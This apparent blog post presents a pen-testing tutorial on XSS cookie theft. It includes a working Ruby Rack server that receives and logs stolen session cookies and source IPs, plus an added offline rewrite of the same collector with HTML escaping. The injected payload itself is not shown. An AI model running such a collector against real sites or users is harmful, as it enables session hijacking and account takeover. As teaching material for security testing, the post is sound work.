One of the many things I got introduced to at Scotland on Rails was the Rack project. Designed to help create flexible web application deployments, it provides a common interface between web servers and Ruby web application frameworks (Rails, Sinatra etc.).
Reading some of the examples, it occurred to me that Rack could be pretty handy for web application testing, where it's often useful to have a minimal web application to bounce things off.
One example of this is demoing XSS attacks. A standard XSS attack is cookie stealing. The way this works is the attacker injects a script tag that references a URL on a server the attacker controls; the script runs in the victim's browser, reads the cookie for the victim site and sends it to that server as a parameter on the URL. (This only works for cookies that aren't flagged HttpOnly, since script can't read those.)
So for example, if we've found an XSS vector we can put


into the vulnerable field, and if we have a server listening on that IP address we get the cookie.
Here's where Rack comes in. You can use it to very quickly write some code that listens on a port and accepts the incoming request (and indeed does anything else you can do with Ruby, but let's start small).
A proof-of-concept script to do this might look like the one below.

#!/usr/bin/env ruby
# Minimal Rack listener for catching cookies sent back by an XSS payload.
# Written against Rack 1.x/2.x (Rack::Handler ships with the rack gem there;
# in Rack 3 the handlers moved to the rackup gem).
require 'rubygems'
require 'rack'

# [[ip, cookie], ...] - a local captured by the closures below (the original
# used a class variable, which newer Rubies reject at the top level)
grabbed = []

builder = Rack::Builder.new do
  use Rack::CommonLogger

  map '/' do
    run proc { |env| [200, {"Content-Type" => "text/html"}, ["<h1> Rack Pen Test Helper</h1>"]] }
  end

  # The XSS payload requests /cookiegrabber?cookie=<document.cookie>
  map '/cookiegrabber' do
    app = proc do |env|
      req = Rack::Request.new(env)
      ip = req.ip.to_s
      cookie = req.params['cookie'] || "No Cookie Parameter passed"
      grabbed << [ip, cookie]
      [200, {"Content-Type" => "text/html"},
       ["grabbed " + cookie + " from " + ip + "<br /> Grabbed " + grabbed.length.to_s + " cookies so far"]]
    end
    run app
  end

  # Report everything captured so far
  map '/cookiegrabbed' do
    app = proc do |env|
      out = ""
      if grabbed.length > 0
        grabbed.each do |crumb|
          out << "Grabbed a cookie with value  " + crumb[1] + " from " + crumb[0] + "<br />"
        end
      else
        out = "Nothing Grabbed so far"
      end
      [200, {"Content-Type" => "text/html"}, [out]]
    end
    run app
  end
end

Rack::Handler::WEBrick.run builder, :Port => 9292
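To show what the script above is actually doing at the Rack interface level, here is an added example (mine, not code from the original post) that builds the same cookie grabber as a plain Rack application: an object with a call(env) method returning [status, headers, body]. It depends only on the Ruby standard library and is driven with hand-built env hashes, so it runs offline with no gem or listening socket. The class name CookieGrabber, the rack_env helper and the sample cookies and addresses are all constructed for the example. It also fixes two things the quick proof of concept leaves open: captured cookies are attacker-supplied input and get HTML-escaped before being reflected into the report, and the source address is taken from REMOTE_ADDR rather than a client-settable header.

```ruby
#!/usr/bin/env ruby
# Added example: a Rack-compatible cookie grabber written against the Rack
# interface only (env hash in, [status, headers, body] out), exercised with
# constructed env hashes so it needs no rack gem and no open port.
require 'cgi'
require 'uri'
require 'stringio'

class CookieGrabber
  attr_reader :grabbed   # [[remote_ip, cookie_string], ...]

  def initialize
    @grabbed = []
  end

  # Rack entry point: any object responding to #call(env) is a Rack app.
  def call(env)
    case env['PATH_INFO']
    when '/cookiegrabber' then grab(env)
    when '/cookiegrabbed' then report
    else html(200, '<h1>Rack Pen Test Helper</h1>')
    end
  end

  private

  # The XSS payload requests /cookiegrabber?cookie=<document.cookie>
  def grab(env)
    params = URI.decode_www_form(env['QUERY_STRING'].to_s).to_h
    cookie = params['cookie'] || 'No Cookie Parameter passed'
    # REMOTE_ADDR is the TCP peer. X-Forwarded-For is deliberately ignored:
    # any client can set it, so it proves nothing about where the hit came from.
    ip = env['REMOTE_ADDR'].to_s
    @grabbed << [ip, cookie]
    html(200, "grabbed #{h(cookie)} from #{h(ip)}<br />Grabbed #{@grabbed.length} cookies so far")
  end

  def report
    return html(200, 'Nothing Grabbed so far') if @grabbed.empty?
    rows = @grabbed.map { |ip, cookie| "Grabbed a cookie with value #{h(cookie)} from #{h(ip)}<br />" }
    html(200, rows.join)
  end

  # Stolen cookies are attacker-controlled input: escape them before
  # reflecting them into HTML, or the helper is itself vulnerable to XSS.
  def h(s)
    CGI.escapeHTML(s)
  end

  def html(status, body)
    [status, { 'Content-Type' => 'text/html' }, [body]]
  end
end

# Constructed request: the minimum a Rack server would hand to the app for
# a GET from the given peer address. Extra CGI-style headers can be merged in.
def rack_env(path, query, remote_addr, extra = {})
  { 'REQUEST_METHOD' => 'GET', 'PATH_INFO' => path, 'QUERY_STRING' => query,
    'REMOTE_ADDR' => remote_addr, 'rack.input' => StringIO.new }.merge(extra)
end

# Three constructed hits: a normal exfiltrated cookie, then one that tries
# to spoof its source and inject markup into the report, then the report.
def run_demo
  app = CookieGrabber.new
  stolen = 'session=abc123; theme=dark'
  app.call(rack_env('/cookiegrabber', "cookie=#{URI.encode_www_form_component(stolen)}", '203.0.113.7'))
  hostile = '<script>alert(1)</script>'
  app.call(rack_env('/cookiegrabber', "cookie=#{URI.encode_www_form_component(hostile)}", '198.51.100.9',
                    'HTTP_X_FORWARDED_FOR' => '127.0.0.1'))
  status, headers, body = app.call(rack_env('/cookiegrabbed', '', '203.0.113.7'))
  [app.grabbed, status, headers, body.join]
end

if __FILE__ == $0
  grabbed, status, _headers, body = run_demo
  puts "captured #{grabbed.length} cookies, report (HTTP #{status}):"
  puts body
end
```

Because CookieGrabber#call follows the Rack contract, the same object can be mounted for real with a config.ru containing `run CookieGrabber.new` and started with `rackup -p 9292`. One difference from the proof of concept above is worth knowing about: Rack::Request#ip will honour an X-Forwarded-For header when one is present, which is what you want behind a reverse proxy but lets a direct client choose what address gets logged; reading REMOTE_ADDR, as this example does, records the actual peer.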

